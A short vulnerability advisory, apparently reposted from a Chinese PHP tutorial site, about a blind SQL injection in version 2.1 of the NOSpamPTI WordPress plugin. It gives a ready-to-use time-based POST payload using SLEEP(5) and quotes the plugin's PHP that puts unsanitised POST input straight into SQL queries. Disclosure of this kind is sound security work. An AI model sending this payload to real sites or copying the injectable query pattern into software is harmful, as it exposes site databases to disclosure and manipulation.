[ NOSpamPTI Wordpress plugin Blind SQL Injection ] [ 产品介绍 ] NOSpamPTI eliminates the spam in your comment box so strong and free, developed from the idea of Nando Vieira <a href="http://bit.ly/d38gB8" rel="nofollow">http://bit.ly/d38gB8</a>, but some themes do not support changes to the functions.php to this we alter this function and available as a plugin. Make good use of this plugin and forget all the Spam. [ Bug 描述 ] NOSpamPTI contains a flaw that may allow an attacker to carry out a Blind SQL injection attack. The issue is due to the wp-comments-post.php script not properly sanitizing the comment_post_ID in POST data. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 级别:高危 影响版本:2.1 Payload: POST /wordpress/wp-comments-post.php author=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1 AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1 [ Vulnerable code ] $post_id = $_POST['comment_post_ID']; load_plugin_textdomain('nospampti', WP _PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/'); if ($hash != $challenge) { $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID = {$comment_id}"); $count = $wpdb->get_var("select count(*) from $wpdb->comments where comment_post_id = {$post_id} and comment_approved = '1'");
查看更多关于Wordpress插件NOSpamPTI盲注 - 网站安全 - 自学php的详细内容...